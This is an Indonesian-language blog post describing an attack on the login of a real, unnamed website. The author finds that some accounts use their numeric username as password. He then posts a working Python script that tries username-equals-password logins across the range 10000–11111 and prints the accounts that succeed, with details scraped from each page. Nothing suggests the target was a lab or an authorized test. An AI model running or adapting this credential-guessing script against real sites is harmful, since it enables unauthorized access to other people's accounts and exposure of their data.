I"%<p>Dictionary attack,  bruteforce attack, soceng serangan serangan yang sudah pada umum kalau hacker udah ga mampu lagi nyerang target dengan cara cara yang halus. Serangan ini seperti memaksa membuka pintu dengan 1000 kunci yang dicoba satu satu. ga efektif dan serangan ini biasanya tidak diperbolehkan untuk digunakan pada CTF ataupun Bug Bounty karena jenis lubang keamanan ini bagi para security engginer sangat tidak rasional dikarenakan serangan ini cukup membutuhkan “<em>insting</em>” yang beketergantungan dengan “<em>luck</em>”</p>

<blockquote>
  <p>“I absolutely hates die”</p>
</blockquote>

<p>yap plural dari dadu dan juga kata kerja dari mati, membutuhkan keberuntungan untuk melakukan hal statis semacam brute force, dimana  penebakan pattern pattern digunakan.</p>

<p>artikel kali ini akan saya jelaskan bagaimana lemahnya internet dimana beberapa orang lebih senang menggunakan password yang sama dengan username. Contoh real kasus yang akan saya jelaskan kali ini dimana ada website yang menggunakan alert pada saat username ataupun password tidak cocok.</p>

<blockquote>
  <p><img src="http://k1m0ch1.github.io/images/fail-attempt-1.png" alt="Fail attempt login" /></p>
</blockquote>

<p>Yap, dengan cara menebak nebak memaksa dengan false attempt pada awalnya akan muncul informasi sederhana, next step adalah mencari tahu user ini mengandung huruf/ kata atau campur.</p>

<p>Ternyata setelah di tes jika kita menginputkan random 5 huruf akan tetap muncul error seperti di atas dan tetap bilang kalau user harus 5 digit.</p>

<p>ok cukup.. berarti 5 angka.</p>

<p>pada contoh kali ini saya tidak akan menggunakan tools bruteforce karena serangan ini cukup sederhana dikarenakan memanfaatkan password yang sama dengan username. next saya mencoba serangan dengan username <em>10001</em> sampai <em>10010</em> dengan password yang sama dengan username.. LETS START!!</p>

<blockquote>
  <p><img src="http://k1m0ch1.github.io/images/fail-attempt-2.png" alt="Kimochi ikeh" /></p>
</blockquote>

<p>fast forward dan ternyata pada user <em>10005</em> berhasil dilakukan berikut juga dengan user <em>10007</em></p>

<blockquote>
  <p><img src="http://k1m0ch1.github.io/images/success-attempt-1.png" alt="haha" /></p>
</blockquote>

<p>next nya saya bikin script python sederhana buat post login dan get cookies di percantik dengan beautifulsoup4 saya looping dari user <em>10000</em> sampai dengan user <em>11111</em></p>

<p>codenya seperti ini :</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">requests</span> <span class="kn">import</span> <span class="n">session</span>
<span class="kn">from</span> <span class="nn">bs4</span> <span class="kn">import</span> <span class="n">BeautifulSoup</span>

<span class="n">base</span> <span class="o">=</span> <span class="mi">10000</span>
<span class="n">endbase</span> <span class="o">=</span> <span class="mi">11111</span>
<span class="n">target</span> <span class="o">=</span> <span class="s">"http://site target/"</span>
<span class="n">proc</span> <span class="o">=</span> <span class="s">"index.php?action=llogin"</span>
<span class="n">a</span><span class="o">=</span><span class="mi">0</span>

<span class="k">for</span> <span class="n">x</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">base</span><span class="p">,</span> <span class="n">endbase</span><span class="p">):</span>

	<span class="n">exp</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">x</span><span class="p">)</span>

	<span class="n">payload</span> <span class="o">=</span> <span class="p">{</span>
		<span class="s">'login'</span> <span class="p">:</span> <span class="s">'login'</span><span class="p">,</span>
	    <span class="s">'username'</span><span class="p">:</span> <span class="n">exp</span><span class="p">,</span>
	    <span class="s">'password'</span><span class="p">:</span> <span class="n">exp</span>
	<span class="p">}</span>

	<span class="k">with</span> <span class="n">session</span><span class="p">()</span> <span class="k">as</span> <span class="n">c</span><span class="p">:</span>
	    <span class="n">c</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="s">'%s%s'</span> <span class="o">%</span> <span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">proc</span><span class="p">),</span> <span class="n">data</span><span class="o">=</span><span class="n">payload</span><span class="p">)</span>
	    <span class="n">response</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'%s'</span><span class="p">,</span> <span class="n">target</span><span class="p">)</span>
	    <span class="n">soup</span> <span class="o">=</span> <span class="n">BeautifulSoup</span><span class="p">(</span><span class="n">response</span><span class="p">.</span><span class="n">text</span><span class="p">,</span> <span class="s">'html.parser'</span><span class="p">)</span>
	    <span class="c1">#print(response.headers)
</span>	    <span class="c1">#print(response.text)
</span>	    <span class="n">parsingnyah</span> <span class="o">=</span> <span class="n">soup</span><span class="p">.</span><span class="n">select</span><span class="p">(</span><span class="s">".top-menu"</span><span class="p">)</span>
	    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">parsingnyah</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">:</span>
	    	<span class="n">parsingnyah</span> <span class="o">=</span> <span class="n">soup</span><span class="p">.</span><span class="n">select</span><span class="p">(</span><span class="s">".top-menu &gt; table &gt; tr &gt; td &gt; br"</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="n">encode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)[</span><span class="mi">22</span><span class="p">:</span><span class="o">-</span><span class="mi">140</span><span class="p">]</span>
	    	<span class="k">print</span> <span class="s">"[+] Success Login user %s = %s"</span> <span class="o">%</span> <span class="p">(</span><span class="n">exp</span><span class="p">,</span><span class="n">parsingnyah</span><span class="p">)</span>
</code></pre></div></div>
<blockquote>
  <p><img src="http://k1m0ch1.github.io/images/lul-script-1.png" alt="haha" /></p>
</blockquote>
:ET